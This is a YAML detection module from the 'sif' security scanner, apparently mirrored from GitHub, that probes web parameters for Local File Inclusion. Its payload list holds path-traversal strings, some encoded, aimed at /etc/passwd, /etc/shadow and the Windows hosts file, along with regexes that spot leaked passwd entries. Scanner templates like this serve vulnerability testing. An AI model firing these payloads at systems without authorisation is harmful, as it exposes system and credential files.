mirror of
https://github.com/lunchcat/sif.git
synced 2026-01-12 04:55:39 -08:00
50 lines
1.1 KiB
YAML
50 lines
1.1 KiB
YAML
# Basic LFI Detection Module
|
|
|
|
id: lfi-basic
|
|
info:
|
|
name: Basic LFI Detection
|
|
author: sif
|
|
severity: high
|
|
description: Detects basic Local File Inclusion vulnerabilities
|
|
tags: [lfi, injection, file-inclusion, owasp-top10]
|
|
|
|
type: http
|
|
|
|
http:
|
|
method: GET
|
|
paths:
|
|
- "{{BaseURL}}/?file={{payload}}"
|
|
- "{{BaseURL}}/?page={{payload}}"
|
|
- "{{BaseURL}}/?path={{payload}}"
|
|
- "{{BaseURL}}/?include={{payload}}"
|
|
- "{{BaseURL}}/?doc={{payload}}"
|
|
- "{{BaseURL}}/?template={{payload}}"
|
|
|
|
payloads:
|
|
- "../../../../../../../etc/passwd"
|
|
- "....//....//....//....//....//etc/passwd"
|
|
- "..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
|
- "/etc/passwd"
|
|
- "../../../../../../../etc/shadow"
|
|
- "../../../../../../../windows/system32/drivers/etc/hosts"
|
|
|
|
threads: 10
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "daemon:.*:1:1:"
|
|
- "nobody:.*:65534:"
|
|
- "127\\.0\\.0\\.1\\s+localhost"
|
|
condition: or
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: detected_file
|
|
part: body
|
|
regex:
|
|
- "(root|daemon|nobody):.*:[0-9]+:[0-9]+:"
|
|
group: 0
|